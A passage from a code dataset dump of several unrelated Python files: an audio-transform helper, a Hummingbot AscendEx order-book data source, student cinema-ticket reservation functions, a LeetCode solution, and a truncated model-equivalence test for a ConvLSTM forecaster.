spectrogram. Shape: [B, FREQ, FRAMES].\n hp (HParams): parameters.\n \"\"\"\n assert len(spectrogram.size()) == 3, \\\n \"Dimensions of spectogram should be 3, found {}\".format(len(spectrogram.size()))\n\n n_spectrograms = spectrogram.shape[0]\n # In case the spectrogram tensor is in the GPU\n spectrogram = spectrogram.detach().to('cpu')\n fig = plt.figure()\n for i in range(0, n_spectrograms):\n fig.add_subplot(n_spectrograms, 1, i + 1)\n plt.imshow(spectrogram[i].detach().to('cpu'), origin='lower', interpolation=\"none\")\n plt.axis('off')\n\n fig.savefig(fname=filepath)\n\n\ndef save_wave(filepath: str, waveform: Tensor, hp: HParams) -> None:\n r\"\"\"Wrapper around torchaudio.save().\n\n Args:\n filepath (str): path where the audio will be saved.\n waveform (Tensor): audio waveform to be saved. Shape: [1, L] where L is the number\n of times the waveform has been sampled.\n hp (HParams): parameters. Parameters needed are sample_rate.\n \"\"\"\n # In case the waveform is in the GPU\n waveform = waveform.detach().to('cpu')\n torchaudio.save(filepath, waveform, hp.audio.sample_rate)\n","sub_path":"src/dataprocessing/transforms.py","file_name":"transforms.py","file_ext":"py","file_size_in_byte":13863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"486829953","text":"#!/usr/bin/env python\nimport asyncio\nimport logging\nimport time\nfrom collections import defaultdict\nfrom typing import Any, Dict, List, Mapping, Optional\n\nimport aiohttp\nimport pandas as pd\nfrom bidict import bidict\n\nfrom hummingbot.connector.exchange.ascend_ex import ascend_ex_constants as CONSTANTS\nfrom hummingbot.connector.exchange.ascend_ex.ascend_ex_order_book import AscendExOrderBook\nfrom hummingbot.connector.exchange.ascend_ex.ascend_ex_utils import build_api_factory, get_hb_id_headers\nfrom hummingbot.core.api_throttler.async_throttler import AsyncThrottler\nfrom hummingbot.core.data_type.order_book import OrderBook\nfrom hummingbot.core.data_type.order_book_message import OrderBookMessage\nfrom hummingbot.core.data_type.order_book_tracker_data_source import OrderBookTrackerDataSource\nfrom hummingbot.core.web_assistant.connections.data_types import RESTMethod, RESTRequest, RESTResponse, WSRequest\nfrom hummingbot.core.web_assistant.web_assistants_factory import WebAssistantsFactory\nfrom hummingbot.core.web_assistant.ws_assistant import WSAssistant\nfrom hummingbot.logger import HummingbotLogger\n\n\nclass AscendExAPIOrderBookDataSource(OrderBookTrackerDataSource):\n MAX_RETRIES = 20\n MESSAGE_TIMEOUT = 30.0\n SNAPSHOT_TIMEOUT = 10.0\n PING_TIMEOUT = 15.0\n HEARTBEAT_PING_INTERVAL = 15.0\n\n TRADE_TOPIC_ID = \"trades\"\n DIFF_TOPIC_ID = \"depth\"\n PING_TOPIC_ID = \"ping\"\n\n _logger: Optional[HummingbotLogger] = None\n _trading_pair_symbol_map: Mapping[str, str] = None\n _mapping_initialization_lock = asyncio.Lock()\n\n @classmethod\n def logger(cls) -> HummingbotLogger:\n if cls._logger is None:\n cls._logger = logging.getLogger(__name__)\n return cls._logger\n\n def __init__(self,\n api_factory: Optional[WebAssistantsFactory] = None,\n throttler: Optional[AsyncThrottler] = None,\n trading_pairs: List[str] = None):\n super().__init__(trading_pairs)\n self._api_factory = api_factory or build_api_factory()\n self._throttler = throttler or self._get_throttler_instance()\n self._trading_pairs: List[str] = trading_pairs\n\n self._message_queue: Dict[str, asyncio.Queue] = defaultdict(asyncio.Queue)\n\n @classmethod\n async def get_last_traded_prices(\n cls,\n trading_pairs: List[str],\n api_factory: Optional[WebAssistantsFactory] = None,\n throttler: Optional[AsyncThrottler] = None\n ) -> Dict[str, float]:\n \"\"\"\n Return a dictionary the trading_pair as key and the current price as value for each trading pair passed as\n parameter\n\n :param trading_pairs: list of trading pairs to get the prices for\n :param api_factory: the instance of the web assistant factory to be used when doing requests to the server.\n If no instance is provided then a new one will be created.\n :param throttler: the instance of the throttler to use to limit request to the server. If it is not specified\n the function will create a new one.\n\n :return: Dictionary of associations between token pair and its latest price\n \"\"\"\n result = {}\n\n for trading_pair in trading_pairs:\n api_factory = api_factory or build_api_factory()\n throttler = throttler or cls._get_throttler_instance()\n rest_assistant = await api_factory.get_rest_assistant()\n\n url = f\"{CONSTANTS.REST_URL}/{CONSTANTS.TRADES_PATH_URL}\"\\\n f\"?symbol={await AscendExAPIOrderBookDataSource.exchange_symbol_associated_to_pair(trading_pair)}\"\n request = RESTRequest(method=RESTMethod.GET, url=url)\n\n async with throttler.execute_task(CONSTANTS.TRADES_PATH_URL):\n resp: RESTResponse = await rest_assistant.call(request=request)\n if resp.status != 200:\n raise IOError(\n f\"Error fetching last traded prices at {CONSTANTS.EXCHANGE_NAME}. \"\n f\"HTTP status is {resp.status}.\"\n )\n\n resp_json = await resp.json()\n if resp_json.get(\"code\") != 0:\n raise IOError(\n f\"Error fetching last traded prices at {CONSTANTS.EXCHANGE_NAME}. \"\n f\"Error is {resp_json.message}.\"\n )\n\n trades = resp_json.get(\"data\").get(\"data\")\n\n # last trade is the most recent trade\n for trade in trades[-1:]:\n result[trading_pair] = float(trade.get(\"p\"))\n\n return result\n\n @staticmethod\n async def get_order_book_data(trading_pair: str,\n api_factory: Optional[WebAssistantsFactory] = None,\n throttler: Optional[AsyncThrottler] = None) -> Dict[str, any]:\n \"\"\"\n Get whole orderbook\n\n :param trading_pair: a trading pair for which the order book should be retrieved\n :param api_factory: the instance of the web assistant factory to be used when doing requests to the server.\n If no instance is provided then a new one will be created.\n :param throttler: the instance of the throttler to use to limit request to the server. If it is not specified\n the function will create a new one.\n\n :return: current order book for the specified trading pair\n \"\"\"\n api_factory = api_factory or build_api_factory()\n throttler = throttler or AscendExAPIOrderBookDataSource._get_throttler_instance()\n rest_assistant = await api_factory.get_rest_assistant()\n\n url = f\"{CONSTANTS.REST_URL}/{CONSTANTS.DEPTH_PATH_URL}\"\\\n f\"?symbol={await AscendExAPIOrderBookDataSource.exchange_symbol_associated_to_pair(trading_pair)}\"\n request = RESTRequest(method=RESTMethod.GET, url=url)\n\n async with throttler.execute_task(CONSTANTS.DEPTH_PATH_URL):\n resp: RESTResponse = await rest_assistant.call(request=request)\n if resp.status != 200:\n raise IOError(\n f\"Error fetching OrderBook for {trading_pair} at {CONSTANTS.EXCHANGE_NAME}. \"\n f\"HTTP status is {resp.status}.\"\n )\n\n data: Dict[str, Any] = await resp.json()\n if data.get(\"code\") != 0:\n raise IOError(\n f\"Error fetching OrderBook for {trading_pair} at {CONSTANTS.EXCHANGE_NAME}. \"\n f\"Error is {data['reason']}.\"\n )\n\n return data[\"data\"]\n\n @classmethod\n def trading_pair_symbol_map_ready(cls):\n \"\"\"\n Checks if the mapping from exchange symbols to client trading pairs has been initialized\n\n :return: True if the mapping has been initialized, False otherwise\n \"\"\"\n return cls._trading_pair_symbol_map is not None and len(cls._trading_pair_symbol_map) > 0\n\n @classmethod\n async def trading_pair_symbol_map(\n cls,\n api_factory: Optional[WebAssistantsFactory] = None,\n throttler: Optional[AsyncThrottler] = None\n ):\n \"\"\"\n Returns the internal map used to translate trading pairs from and to the exchange notation.\n In general this should not be used. Instead call the methods `exchange_symbol_associated_to_pair` and\n `trading_pair_associated_to_exchange_symbol`\n\n :param api_factory: the web assistant factory to use in case the symbols information has to be requested\n :param throttler: the throttler instance to use in case the symbols information has to be requested\n\n :return: bidirectional mapping between trading pair exchange notation and client notation\n \"\"\"\n if not cls.trading_pair_symbol_map_ready():\n async with cls._mapping_initialization_lock:\n # Check condition again (could have been initialized while waiting for the lock to be released)\n if not cls.trading_pair_symbol_map_ready():\n await cls._init_trading_pair_symbols(api_factory, throttler)\n\n return cls._trading_pair_symbol_map\n\n @staticmethod\n async def exchange_symbol_associated_to_pair(\n trading_pair: str,\n api_factory: Optional[WebAssistantsFactory] = None,\n throttler: Optional[AsyncThrottler] = None,\n ) -> str:\n \"\"\"\n Used to translate a trading pair from the client notation to the exchange notation\n\n :param trading_pair: trading pair in client notation\n :param api_factory: the web assistant factory to use in case the symbols information has to be requested\n :param throttler: the throttler instance to use in case the symbols information has to be requested\n\n :return: trading pair in exchange notation\n \"\"\"\n symbol_map = await AscendExAPIOrderBookDataSource.trading_pair_symbol_map(\n api_factory=api_factory,\n throttler=throttler)\n return symbol_map.inverse[trading_pair]\n\n @staticmethod\n async def trading_pair_associated_to_exchange_symbol(\n symbol: str,\n api_factory: Optional[WebAssistantsFactory] = None,\n throttler: Optional[AsyncThrottler] = None) -> str:\n \"\"\"\n Used to translate a trading pair from the exchange notation to the client notation\n\n :param symbol: trading pair in exchange notation\n :param api_factory: the web assistant factory to use in case the symbols information has to be requested\n :param throttler: the throttler instance to use in case the symbols information has to be requested\n\n :return: trading pair in client notation\n \"\"\"\n symbol_map = await AscendExAPIOrderBookDataSource.trading_pair_symbol_map(\n api_factory=api_factory,\n throttler=throttler)\n return symbol_map[symbol]\n\n @staticmethod\n async def fetch_trading_pairs() -> List[str]:\n \"\"\"\n Returns a list of all known trading pairs enabled to operate with\n\n :return: list of trading pairs in client notation\n \"\"\"\n mapping = await AscendExAPIOrderBookDataSource.trading_pair_symbol_map()\n return list(mapping.values())\n\n async def get_new_order_book(self, trading_pair: str) -> OrderBook:\n \"\"\"\n Creates a local instance of the exchange order book for a particular trading pair\n\n :param trading_pair: the trading pair for which the order book has to be retrieved\n\n :return: a local copy of the current order book in the exchange\n \"\"\"\n snapshot: Dict[str, Any] = await self.get_order_book_data(trading_pair,\n api_factory=self._api_factory,\n throttler=self._throttler)\n snapshot_timestamp: float = snapshot.get(\"data\").get(\"ts\")\n snapshot_msg: OrderBookMessage = AscendExOrderBook.snapshot_message_from_exchange(\n snapshot.get(\"data\"),\n snapshot_timestamp,\n metadata={\"trading_pair\": trading_pair}\n )\n order_book = self.order_book_create_function()\n order_book.apply_snapshot(snapshot_msg.bids, snapshot_msg.asks, snapshot_msg.update_id)\n return order_book\n\n async def listen_for_subscriptions(self):\n \"\"\"\n Connects to the trade events and order diffs websocket endpoints and listens to the messages sent by the\n exchange. Each message is stored in its own queue.\n \"\"\"\n ws = None\n while True:\n try:\n ws = await self._subscribe_to_order_book_streams()\n async for ws_response in ws.iter_messages():\n data = ws_response.data\n if \"result\" in data:\n continue\n event_type = data.get(\"m\")\n if event_type in [self.TRADE_TOPIC_ID, self.DIFF_TOPIC_ID]:\n self._message_queue[event_type].put_nowait(data)\n if event_type in [self.PING_TOPIC_ID]:\n await self._handle_ping_message(ws)\n except asyncio.CancelledError:\n raise\n except Exception:\n self.logger().error(\"Unexpected error occurred when listening to order book streams. \"\n \"Retrying in 5 seconds...\",\n exc_info=True)\n await self._sleep(5.0)\n finally:\n ws and await ws.disconnect()\n\n async def listen_for_trades(self, ev_loop: asyncio.BaseEventLoop, output: asyncio.Queue):\n \"\"\"\n Reads the trade events queue. For each event creates a trade message instance and adds it to the output queue\n\n :param ev_loop: the event loop the method will run in\n :param output: a queue to add the created trade messages\n \"\"\"\n msg_queue = self._message_queue[self.TRADE_TOPIC_ID]\n while True:\n try:\n msg = await msg_queue.get()\n trading_pair = \\\n await AscendExAPIOrderBookDataSource.trading_pair_associated_to_exchange_symbol(msg.get(\"symbol\"))\n trades = msg.get(\"data\")\n\n for trade in trades:\n trade_timestamp: int = trade.get(\"ts\")\n trade_msg: OrderBookMessage = AscendExOrderBook.trade_message_from_exchange(\n trade,\n trade_timestamp,\n metadata={\"trading_pair\": trading_pair}\n )\n output.put_nowait(trade_msg)\n except asyncio.CancelledError:\n raise\n except Exception:\n self.logger().error(\"Unexpected error with WebSocket connection. Retrying after 30 seconds...\",\n exc_info=True)\n\n async def listen_for_order_book_diffs(self, ev_loop: asyncio.BaseEventLoop, output: asyncio.Queue):\n \"\"\"\n Reads the order diffs events queue. For each event creates a diff message instance and adds it to the\n output queue\n\n :param ev_loop: the event loop the method will run in\n :param output: a queue to add the created diff messages\n \"\"\"\n msg_queue = self._message_queue[self.DIFF_TOPIC_ID]\n while True:\n try:\n msg = await msg_queue.get()\n msg_timestamp: int = msg.get(\"data\").get(\"ts\")\n trading_pair = \\\n await AscendExAPIOrderBookDataSource.trading_pair_associated_to_exchange_symbol(msg.get(\"symbol\"))\n order_book_message: OrderBookMessage = AscendExOrderBook.diff_message_from_exchange(\n msg.get(\"data\"),\n msg_timestamp,\n metadata={\"trading_pair\": trading_pair}\n )\n output.put_nowait(order_book_message)\n except asyncio.CancelledError:\n raise\n except Exception as e:\n self.logger().debug(str(e))\n self.logger().error(\"Unexpected error with WebSocket connection. Retrying after 30 seconds...\",\n exc_info=True)\n await self._sleep(30.0)\n\n async def listen_for_order_book_snapshots(self, ev_loop: asyncio.BaseEventLoop, output: asyncio.Queue):\n \"\"\"\n This method runs continuously and request the full order book content from the exchange every hour.\n The method uses the REST API from the exchange because it does not provide an endpoint to get the full order\n book through websocket. With the information creates a snapshot messages that is added to the output queue\n\n :param ev_loop: the event loop the method will run in\n :param output: a queue to add the created snapshot messages\n \"\"\"\n while True:\n try:\n for trading_pair in self._trading_pairs:\n try:\n snapshot: Dict[str, any] = await self.get_order_book_data(trading_pair,\n api_factory=self._api_factory,\n throttler=self._throttler)\n snapshot_timestamp: float = snapshot.get(\"data\").get(\"ts\")\n snapshot_msg: OrderBookMessage = AscendExOrderBook.snapshot_message_from_exchange(\n snapshot.get(\"data\"),\n snapshot_timestamp,\n metadata={\"trading_pair\": trading_pair}\n )\n output.put_nowait(snapshot_msg)\n self.logger().debug(f\"Saved order book snapshot for {trading_pair}\")\n # Be careful not to go above API rate limits.\n await self._sleep(5.0)\n except asyncio.CancelledError:\n raise\n except Exception:\n self.logger().network(\n \"Unexpected error with WebSocket connection.\",\n exc_info=True,\n app_warning_msg=\"Unexpected error with WebSocket connection. Retrying in 5 seconds. \"\n \"Check network connection.\"\n )\n await self._sleep(5.0)\n this_hour: pd.Timestamp = pd.Timestamp.utcnow().replace(minute=0, second=0, microsecond=0)\n next_hour: pd.Timestamp = this_hour + pd.Timedelta(hours=1)\n delta: float = next_hour.timestamp() - time.time()\n await self._sleep(delta)\n except asyncio.CancelledError:\n raise\n except Exception:\n self.logger().error(\"Unexpected error.\", exc_info=True)\n await self._sleep(5.0)\n\n @classmethod\n def _get_throttler_instance(cls) -> AsyncThrottler:\n throttler = AsyncThrottler(CONSTANTS.RATE_LIMITS)\n return throttler\n\n @classmethod\n async def _init_trading_pair_symbols(\n cls,\n api_factory: Optional[WebAssistantsFactory] = None,\n throttler: Optional[AsyncThrottler] = None):\n \"\"\"\n Initialize mapping of trade symbols in exchange notation to trade symbols in client notation\n \"\"\"\n mapping = bidict()\n\n api_factory = api_factory or build_api_factory()\n rest_assistant = await api_factory.get_rest_assistant()\n throttler = throttler or cls._get_throttler_instance()\n\n url = f\"{CONSTANTS.REST_URL}/{CONSTANTS.PRODUCTS_PATH_URL}\"\n request = RESTRequest(method=RESTMethod.GET, url=url)\n\n try:\n async with throttler.execute_task(limit_id=CONSTANTS.PRODUCTS_PATH_URL):\n response: RESTResponse = await rest_assistant.call(request=request)\n if response.status == 200:\n data: Dict[str, Dict[str, Any]] = await response.json()\n for symbol_data in data[\"data\"]:\n mapping[symbol_data[\"symbol\"]] = f\"{symbol_data['baseAsset']}-{symbol_data['quoteAsset']}\"\n except Exception as ex:\n cls.logger().error(f\"There was an error requesting exchange info ({str(ex)})\")\n\n cls._trading_pair_symbol_map = mapping\n\n async def _subscribe_to_order_book_streams(self) -> aiohttp.ClientWebSocketResponse:\n \"\"\"\n Subscribes to the order book diff orders events through the provided websocket connection.\n \"\"\"\n try:\n trading_pairs = \",\".join([\n await AscendExAPIOrderBookDataSource.exchange_symbol_associated_to_pair(trading_pair)\n for trading_pair in self._trading_pairs\n ])\n subscription_payloads = [\n {\n \"op\": CONSTANTS.SUB_ENDPOINT_NAME,\n \"ch\": f\"{topic}:{trading_pairs}\"\n }\n for topic in [self.DIFF_TOPIC_ID, self.TRADE_TOPIC_ID]\n ]\n\n ws: WSAssistant = await self._api_factory.get_ws_assistant()\n url = CONSTANTS.WS_URL\n headers = get_hb_id_headers()\n await ws.connect(ws_url=url, ws_headers=headers, ping_timeout=self.HEARTBEAT_PING_INTERVAL)\n\n for payload in subscription_payloads:\n subscribe_request: WSRequest = WSRequest(payload)\n async with self._throttler.execute_task(CONSTANTS.SUB_ENDPOINT_NAME):\n await ws.send(subscribe_request)\n\n self.logger().info(f\"Subscribed to {self._trading_pairs} orderbook trading and delta streams...\")\n\n return ws\n except asyncio.CancelledError:\n raise\n except Exception:\n self.logger().error(\"Unexpected error occurred subscribing to order book trading and delta streams...\")\n raise\n\n async def _handle_ping_message(self, ws: aiohttp.ClientWebSocketResponse):\n \"\"\"\n Responds with pong to a ping message send by a server to keep a websocket connection alive\n \"\"\"\n async with self._throttler.execute_task(CONSTANTS.PONG_ENDPOINT_NAME):\n payload = {\n \"op\": \"pong\"\n }\n pong_request: WSRequest = WSRequest(payload)\n await ws.send(pong_request)\n","sub_path":"hummingbot/connector/exchange/ascend_ex/ascend_ex_api_order_book_data_source.py","file_name":"ascend_ex_api_order_book_data_source.py","file_ext":"py","file_size_in_byte":21455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"107733455","text":"import os\nimport Data_Functions\nimport Movies_Functions\nfrom time import gmtime, strftime\nfrom Data_Functions import istampajSlobodnaMesta\nfrom Movies_Functions import ispisProjekcija, ispisFilmova\n\ndef rezKarataMeni(slobodnaSedista, projekcije, ulogovan, karte):\n os.system('cls')\n while True:\n ispisProjekcija(projekcije)\n sifra = input(\"Uneiste sifru projekcije:\")\n\n istampajSlobodnaMesta(slobodnaSedista)\n\n dan = input(\"Unesite dan\")\n\n unosSediste = input(\"Unesite sediste: \")\n rezervacija = rezervisiSediste(unosSediste, sifra, dan)\n\n if rezervacija == True:\n print(\"Uspesno ste rezervisali kartu\")\n karta = {}\n karta[\"imePrezime\"] = str(ulogovan[\"ime\"] + ulogovan[\"prezime\"])\n karta[\"kIme\"] = ulogovan[\"korisnickoIme\"]\n karta[\"oznakaSedista\"] = unosSediste\n karta[\"datumProdaje\"] = strftime(\"%d-%m-%Y\", gmtime())\n karta[\"rezIliKupljena\"] = \"Rezervisana\"\n for projekcija in projekcije:\n if projekcija[\"sifra\"] == sifra:\n karta[\"termin\"] = str(projekcija[\"vremePocetka\"] + \"-\" + projekcija[\"vremeKraja\"])\n\n karte.append(karta)\n\n while True:\n print(\"Da li zelite da rezervisete jos jednu?\")\n print(\" 1 - Da\")\n print(\" 2 - Nazad\")\n unos = input(\"Unesite opciju:\")\n if unos == 1:\n break\n elif unos == 2:\n return\n else:\n print(\"Pogresan unos.Pokusajte ponovo \")\n\n\n continue\n else:\n os.system('cls')\n print(\"Mesto koje ste probali da zauzmete je zauzeto. Porobajte ponovo.\")\n continue\n\n\n\ndef pregledKarataKupac(karte,ulogovan):\n nasao = 0\n for karta in karte:\n if ulogovan[\"korisnickoIme\"] == karta[\"kIme\"] and karta[\"rezIliKupljena\"] == \"Rezervisana\":\n print(Data_Functions.formatirajKarte(karta))\n nasao = 1\n if nasao == 0:\n print(\"Ne postoji karta na vasem imenu.\")\n\n\n\n return nasao\n\ndef pregledKarataProdavac(karte):\n\n for karta in karte:\n print(Data_Functions.formatirajKarte(karta))\n\n return\n\ndef otkaziRezKarteKupac(karte,ulogovan):\n i=0\n j=-1\n index = 0\n nasao = 0\n for karta in karte:\n if ulogovan[\"korisnickoIme\"] == karta[\"kIme\"] and karta[\"rezIliKupljena\"] == \"Rezervisana\":\n nasao = 1\n\n if nasao == 0:\n print(\"Ne postoji karta na vasem imenu. \")\n input(\"Pritisnite Enter za dalje\")\n return karte\n\n print(\"Izaberite kartu koju zelite da ponistite:\")\n for karta in karte:\n if ulogovan[\"korisnickoIme\"] == karta[\"kIme\"] and karta[\"rezIliKupljena\"] == \"Rezervisana\":\n print(str(i) + \" - \" + Data_Functions.formatirajKarte(karta))\n i= i + 1\n izbor = input(\"\")\n\n for karta in karte:\n j+=1\n if ulogovan[\"korisnickoIme\"] == karta[\"kIme\"] and karta[\"rezIliKupljena\"] == \"Rezervisana\":\n i+=1\n if i== izbor:\n index = j\n break\n if j== -1:\n print(\"Pogresan unos karte.\")\n input(\"Enter\")\n return karte\n else:\n karte.pop(index)\n\n return karte\n\ndef otkaziRezKarteProdavac(karte):\n nasao = 0\n i=0\n j=0\n index = -1\n for karta in karte:\n if karta[\"rezIliKupljena\"] == \"Rezervisana\":\n nasao = 1\n\n if nasao == 0:\n print(\"Ne postoji karta na vasem imenu. \")\n input(\"Pritisnite Enter za dalje\")\n return karte\n\n print(\"Izaberite kartu koju zelite da ponistite:\")\n for karta in karte:\n if karta[\"rezIliKupljena\"] == \"Rezervisana\":\n print(str(i) + \" - \" + Data_Functions.formatirajKarte(karta))\n i = i + 1\n izbor = input(\"\")\n\n for karta in karte:\n j += 1\n if karta[\"rezIliKupljena\"] == \"Rezervisana\":\n i += 1\n if i == izbor:\n index = j\n break\n if j == -1:\n print(\"Pogresan unos karte.\")\n input(\"Enter\")\n return karte\n else:\n karte.pop(index)\n\n return karte\n\ndef rezervisiSediste(unosSediste, sifra, dan):\n global slobodnaSedista\n\n for sediste in slobodnaSedista:\n if sediste[\"sifra\"] == str(sifra + dan):\n if(sediste[\"ukupnoPraznih\"] == 0):\n return False\n else:\n i = int(unosSediste[0])\n j = ord(unosSediste[1]) - 65\n if sediste[\"matrica\"][i * sediste[\"kolona\"] + j] == 1:\n return False\n else:\n sediste[\"matrica\"][i * sediste[\"kolona\"] + j] = 1\n sediste[\"ukupnoPraznih\"]-=1\n return True\n return False\n\ndef pretragaKarataMeni(karte,projekcije):\n\n os.system(\"cls\")\n print(\"Izaberite po cemu zelite da pretrazujete.\")\n print(\" 1 - Sifri projekcije\")\n print(\" 2 - Imenu\")\n print(\" 3 - Prezimenu \")\n print(\" 4 - Korisnickom imenu\")\n print(\" 5 - Vremenu pocetka/kraja\")\n print(\" 6 - Datumu\")\n print(\" 7 - Po stanju (rezervisana ili kupljena\")\n izbor =input (\" Unesite opciju:\")\n os.system(\"cls\")\n if izbor == \"1\":\n Movies_Functions.ispisProjekcija(projekcije)\n sifra =input(\"Unesite sifru projekcije: \")\n termin = \"\"\n for projekcija in projekcije:\n if projekcija[\"sifra\"] == sifra:\n termin = str(projekcija[\"vremePocetka\"]) +\"-\" + (projekcija[\"vremeKraja\"])\n\n rez = Data_Functions.pretragaPoStringVrednosti(karte, \"termin\", termin)\n print(ispisKarata(rez))\n\n elif izbor == \"2\":\n ime = input(\"Unesite ime:\")\n pretrazenaLista = Data_Functions.pretragaPoStringVrednosti(karte,\"imePrezime\",ime)\n print(ispisKarata(pretrazenaLista))\n\n elif izbor == \"3\":\n prezime = input(\"Unesite prezime:\")\n pretrazenaLista = Data_Functions.pretragaPoStringVrednosti(karte,\"imePrezime\",prezime)\n print(ispisKarata(pretrazenaLista))\n elif izbor == \"4\":\n username = input(\"Unesite korisnicko ime:\")\n pretrazenaLista = Data_Functions.pretragaPoStringVrednosti(karte, \"kIme\", username)\n print(ispisKarata(pretrazenaLista))\n elif izbor == \"5\":\n vreme = input(\"Unesite vreme\")\n rez = Data_Functions.pretragaPoStringVrednosti(karte, \"termin\", vreme)\n print(ispisKarata(rez))\n elif izbor == \"6\":\n datum = input(\"Unesite datum\")\n rez = Data_Functions.pretragaPoStringVrednosti(karte, \"datumProdaje\", datum)\n print(ispisKarata(rez))\n elif izbor == \"7\":\n stanje = input(\"Unesite stanje karte(Rezervisana/Kupljena)\")\n rez = Data_Functions.pretragaPoStringVrednosti(karte, \"rezIliKupljena\", stanje)\n print(ispisKarata(rez))\n else:\n return\n\n\n return\n\ndef prodajaRezervisaneKarte(karte):\n\n i= 0\n j=0\n print(\"Izaberite kartu koju zelite da prodate:\")\n for karta in karte:\n j = j + 1\n if karta[\"rezIliKupljena\"] == \"Rezervisana\":\n print(str(i) + \" - \" + Data_Functions.formatirajKarte(karta))\n i = i + 1\n izbor = int(input(\"\"))\n\n\n pomocna = {}\n indeks = 0\n j = 0\n i = 0\n for karta in karte:\n j = j + 1\n if karta[\"rezIliKupljena\"] == \"Rezervisana\":\n if i == izbor:\n pomocna[\"imePrezime\"] = karta[\"imePrezime\"]\n pomocna[\"kIme\"] = karta[\"kIme\"]\n pomocna[\"termin\"] = karta[\"termin\"]\n pomocna[\"oznakaSedista\"] = karta[\"oznakaSedista\"]\n pomocna[\"datumProdaje\"] = karta[\"datumProdaje\"]\n pomocna[\"rezIliKupljena\"] = \"Kupljena\"\n karte[j][\"rezIliKupljena\"] = \"Kupljena\"\n indeks = j\n i += 1\n\n return karte\n\ndef ispisKarata(karte):\n str = \"\"\n\n for karta in karte:\n str += \"|{0:15}|{1:15}|{2:15}|{3:15}|{4:15}|{5:15}|\".format(karta[\"imePrezime\"],\n karta[\"kIme\"],\n karta[\"termin\"],\n karta[\"oznakaSedista\"],\n karta[\"datumProdaje\"],\n karta[\"rezIliKupljena\"])\n str += \"\\n\"\n print(str)\n print(\"\\n\\n Klikni enter za dalje\")\n input(\"\")\n\n return\n\n\ndef ispisTermina(termini):\n str = \"\"\n\n\n for termin in termini:\n str += \"|{0:15}|{1:15}|\".format(termin[\"sifra\"], termin[\"datum\"])\n\n str += \"\\n\"\n\n print(str)\n print(\"\\n\\n Klikni enter za dalje\")\n input(\"\")\n\n return","sub_path":"ProjekatOP/Tickets_Functions.py","file_name":"Tickets_Functions.py","file_ext":"py","file_size_in_byte":8814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"349307201","text":"# import Integer\nclass Solution:\n def integerReplacement(self, n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n count = 0\n c = bin(int(n))[2:]\n while True:\n if c == '1':\n return count\n if c == '11':\n return count + 2\n if c[-1] == '0':\n c = c[:-1]\n elif c[-1] == c[-2] == '1':\n c = bin(int(c, 2) + 1)[2:]\n elif c[-1] == '1' and c [-2] == '0':\n c = bin(int(c, 2) - 1)[2:]\n count += 1\n\nprint(Solution.integerReplacement(Solution(), 3))","sub_path":"lt/lt397.py","file_name":"lt397.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"592428696","text":"from copy import deepcopy\nimport sys, os\n\nimport torch\nimport numpy as np\n\nfrom vp_suite.models import EF_ConvLSTM as OurEF_ConvLSTM\nfrom vp_suite.utils.models import state_dicts_equal\n\nREFERENCE_GIT_URL = \"https://github.com/Hzzone/Precipitation-Nowcasting.git\"\nREPO_DIR = \"Precipitation-Nowcasting\"\n\n\n# noinspection PyUnresolvedReferences\ndef test_impl():\n # cfg needs to be imported due to circular import in their code, however it is not loadable by default due to\n # faulty assertion statements -> Remove 'assert' statements from config file so that it actually gets loaded.\n cfg_module_fp = os.path.join(sys.path[0], \"nowcasting/config.py\")\n with open(cfg_module_fp, 'r') as cfg_module_file:\n lines = cfg_module_file.readlines()\n with open(cfg_module_fp, 'w') as cfg_module_file:\n for line in lines:\n if \"assert\" not in line:\n cfg_module_file.write(line)\n\n from nowcasting.config import cfg\n from unittest.mock import Mock\n sys.modules[\"pandas\"] = Mock()\n sys.modules[\"nowcasting.hko.evaluation\"] = Mock()\n sys.modules[\"nowcasting.train_and_test\"] = Mock()\n from nowcasting.models.forecaster import Forecaster\n from nowcasting.models.encoder import Encoder\n from nowcasting.models.model import EF as TheirEF\n from experiments.net_params import encoder_params, forecaster_params, \\\n convlstm_encoder_params, convlstm_forecaster_params\n\n device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n batch_size = 1\n context_frames, pred_frames = 5, 20 # default values for their EF model\n c, h, w = 1, 480, 480 # their default EF model takes in images of shape (1, 480, 480)\n\n # set up original models\n print(\"setting up their model\")\n their_convlstm_encoder = Encoder(convlstm_encoder_params[0], convlstm_encoder_params[1]).to(device)\n their_convlstm_forecaster = Forecaster(convlstm_forecaster_params[0], convlstm_forecaster_params[1]).to(device)\n their_model = TheirEF(their_convlstm_encoder, their_convlstm_forecaster).to(device)\n\n # set up our models\n print(\"setting up our model\")\n our_model = OurEF_ConvLSTM(device, **get_HKO_config_ConvLSTM(c, h, w)).to(device)\n\n # check and assign state dicts\n print(\"checking model state dicts\")\n if not state_dicts_equal(their_model, our_model):\n raise AssertionError(\"State dicts not equal!\")\n our_model.load_state_dict(deepcopy(their_model.state_dict()))\n if not state_dicts_equal(their_model, our_model, check_values=True):\n raise AssertionError(\"State dicts not equal!\")\n\n # set up input\n print(\"setting up input\")\n their_x = torch.rand(context_frames, batch_size, c, h, w, device=device)\n our_x = their_x.clone().permute((1, 0, 2, 3, 4))\n\n # infer: their model\n print(\"infer: theirs\")\n their_model.eval()\n their_out = their_model(their_x)\n print(their_out.shape)\n\n # infer: our model\n print(\"infer: ours\")\n our_model.eval()\n our_out = our_model(our_x, pred_frames=pred_frames)[0].permute((1, 0, 2, 3, 4))\n\n # checks\n print(\"check results\")\n theirs = their_out.detach().cpu().numpy()\n ours = our_out.detach().cpu().numpy()\n if theirs.shape != ours.shape:\n raise AssertionError(f\"Prediction shapes are not equal. \"\n f\"Theirs: {theirs.shape}, ours: {ours.shape}\")\n # save_arr_hist(np.abs(theirs - ours), test_id)\n if not np.allclose(theirs, ours, rtol=0, atol=1e-4):\n raise AssertionError(\"Predictions are not equal.\")\n\n\ndef get_HKO_config_ConvLSTM(c, h, w):\n return {\n \"img_shape\": (c, h, w),\n \"action_size\": 0,\n \"tensor_value_range\": [0.0, 1.0],\n\n \"num_layers\": 3,\n \"enc_c\": [8, 64, 192, 192, 192, 192],\n \"dec_c\": [192, 192, 192, 64, 64, 8],\n \n \"enc_conv_names\": [\"conv1_leaky_1\", 